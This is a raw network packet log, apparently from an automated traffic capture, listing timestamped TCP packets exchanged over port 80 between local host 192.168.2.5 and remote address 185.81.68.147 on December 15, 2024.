                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.476294994 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.477487087 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.477581978 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.477679968 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.478662968 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.478698015 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.478792906 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.480051041 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.480062962 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.480093956 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.481254101 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.481439114 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.481525898 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.482522964 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.482556105 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.482640028 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.483809948 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.483867884 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.483901978 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.485138893 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.485148907 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.485181093 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.486371040 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.486449003 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.486483097 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.487653971 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.487698078 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.487795115 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.488938093 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.488949060 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.488981962 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.490093946 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.490139008 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.490247011 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.491482019 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.491661072 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.491694927 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.492747068 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.492763042 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.492790937 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.493978024 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.494313002 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.494344950 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.495503902 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.495538950 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.495723009 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.496551991 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.496567965 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.496608019 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.497818947 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.497875929 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.497911930 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.499083996 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.499100924 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.499120951 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.500348091 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.500392914 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.501429081 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.501688957 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.501732111 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.501765966 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.502931118 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.502964973 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.503022909 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.504240036 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.504491091 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.504528046 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.505414009 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.505583048 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.505676031 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.506664038 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.506697893 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.506766081 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.507982016 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.507993937 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.508023977 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.509191990 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.509253025 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.509305954 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.510483027 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.510631084 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.510668993 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.511842012 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.511853933 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.511887074 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.513079882 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.513137102 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.513176918 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.514296055 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.514880896 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.514939070 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.515666008 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.515678883 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.515701056 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.516932011 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.516949892 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.516988993 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.518213034 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.518224955 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.518261909 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.519387007 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.519432068 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.519715071 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.520714045 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.521167994 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.521188974 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.521884918 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.522260904 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.522309065 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.523252010 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.523271084 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.523298025 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.524461985 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.524517059 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.524684906 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.525758982 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.525801897 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.525863886 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.527034998 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.527051926 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.527076006 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.528187037 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.528259993 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.528306961 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.568749905 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.654468060 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.654623985 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.654963970 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.655064106 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.655138969 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.655189037 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.656132936 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.656219006 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.656302929 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.657371998 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.657385111 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.657484055 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.658510923 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.658523083 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.658618927 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.659687996 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.659723997 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.659970999 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.660815001 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.660918951 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.661081076 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.662071943 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.662163019 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.663384914 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.663497925 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.663631916 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.663681030 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.664345026 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.664829969 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.664988041 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.665612936 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.665647984 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.665704012 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.666656017 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.666855097 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.666959047 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.668056965 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.668174028 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.669104099 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.669140100 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.669173956 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.669207096 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.670258999 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.670336962 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.670402050 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.671382904 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.671734095 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.671780109 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.672626019 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.672661066 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.672705889 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.673835039 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.673870087 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.673918009 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.674949884 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.674984932 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.676119089 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.676152945 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.676186085 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.676218987 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.677372932 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.677407980 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.677467108 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.678438902 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.678555965 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.679682016 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.679747105 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.679835081 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.679887056 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.680998087 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.681080103 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.681130886 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.682007074 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.682039976 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.683211088 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.683271885 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.683398962 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.683445930 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.684314013 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.684366941 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.685254097 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.685398102 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.685497999 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.686669111 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.686738014 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.686994076 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.687045097 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.687848091 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.687881947 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.689050913 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.689085960 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.689121962 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.689153910 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.690300941 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.690335035 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.690397024 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.691392899 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.691472054 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.692523003 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.692559958 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.692617893 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.692617893 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.693780899 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.693815947 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.695276976 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.695329905 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.695333004 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.695384979 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.696212053 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.696438074 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.696485996 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.696599960 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.697232008 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.697282076 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.697328091 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.698307991 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.698342085 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.699505091 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.699539900 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.699621916 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.699654102 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.700675964 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.700710058 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.700814009 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.701772928 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.702033043 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.702224016 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.702991009 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.703023911 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.703125000 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.704164028 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.704196930 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.704345942 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.705246925 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.705281019 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.705375910 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.706478119 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.706511021 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.706767082 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.707534075 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.707912922 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.708019018 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.708813906 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.708847046 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.708967924 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.709901094 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.710036039 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.710131884 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.711153984 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.711188078 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.711605072 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.712296963 CET8049708185.81.68.147192.168.2.5
